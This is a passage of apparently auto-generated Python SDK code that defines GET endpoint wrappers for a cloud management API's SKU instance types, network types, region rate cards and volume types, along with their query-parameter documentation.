'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_instance_type_by_moid = _Endpoint(
settings={
'response_type': (CloudSkuInstanceType,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuInstanceTypes/{Moid}',
'operation_id': 'get_cloud_sku_instance_type_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_instance_type_by_moid
)
def __get_cloud_sku_instance_type_list(
self,
**kwargs
):
"""Read a 'cloud.SkuInstanceType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_instance_type_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuInstanceTypeResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_instance_type_list = _Endpoint(
settings={
'response_type': (CloudSkuInstanceTypeResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuInstanceTypes',
'operation_id': 'get_cloud_sku_instance_type_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_instance_type_list
)
def __get_cloud_sku_network_type_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.SkuNetworkType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_network_type_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuNetworkType
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_network_type_by_moid = _Endpoint(
settings={
'response_type': (CloudSkuNetworkType,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuNetworkTypes/{Moid}',
'operation_id': 'get_cloud_sku_network_type_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_network_type_by_moid
)
def __get_cloud_sku_network_type_list(
self,
**kwargs
):
"""Read a 'cloud.SkuNetworkType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_network_type_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuNetworkTypeResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_network_type_list = _Endpoint(
settings={
'response_type': (CloudSkuNetworkTypeResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuNetworkTypes',
'operation_id': 'get_cloud_sku_network_type_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_network_type_list
)
def __get_cloud_sku_region_rate_cards_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.SkuRegionRateCards' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_region_rate_cards_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuRegionRateCards
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_region_rate_cards_by_moid = _Endpoint(
settings={
'response_type': (CloudSkuRegionRateCards,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuRegionRateCards/{Moid}',
'operation_id': 'get_cloud_sku_region_rate_cards_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_region_rate_cards_by_moid
)
def __get_cloud_sku_region_rate_cards_list(
self,
**kwargs
):
"""Read a 'cloud.SkuRegionRateCards' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_region_rate_cards_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuRegionRateCardsResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_region_rate_cards_list = _Endpoint(
settings={
'response_type': (CloudSkuRegionRateCardsResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuRegionRateCards',
'operation_id': 'get_cloud_sku_region_rate_cards_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_region_rate_cards_list
)
def __get_cloud_sku_volume_type_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.SkuVolumeType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_volume_type_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuVolumeType
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_volume_type_by_moid = _Endpoint(
settings={
'response_type': (CloudSkuVolumeType,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuVolumeTypes/{Moid}',
'operation_id': 'get_cloud_sku_volume_type_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_volume_type_by_moid
)
def __get_cloud_sku_volume_type_list(
self,
**kwargs
):
"""Read a 'cloud.SkuVolumeType' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_sku_volume_type_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
CloudSkuVolumeTypeResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_cloud_sku_volume_type_list = _Endpoint(
settings={
'response_type': (CloudSkuVolumeTypeResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/cloud/SkuVolumeTypes',
'operation_id': 'get_cloud_sku_volume_type_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_cloud_sku_volume_type_list
)
def __get_cloud_tfc_agentpool_by_moid(
self,
moid,
**kwargs
):
"""Read a 'cloud.TfcAgentpool' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_cloud_tfc_agentpool_by_moid(moid, async_req=True)
>>> result = thread.get()
Args:
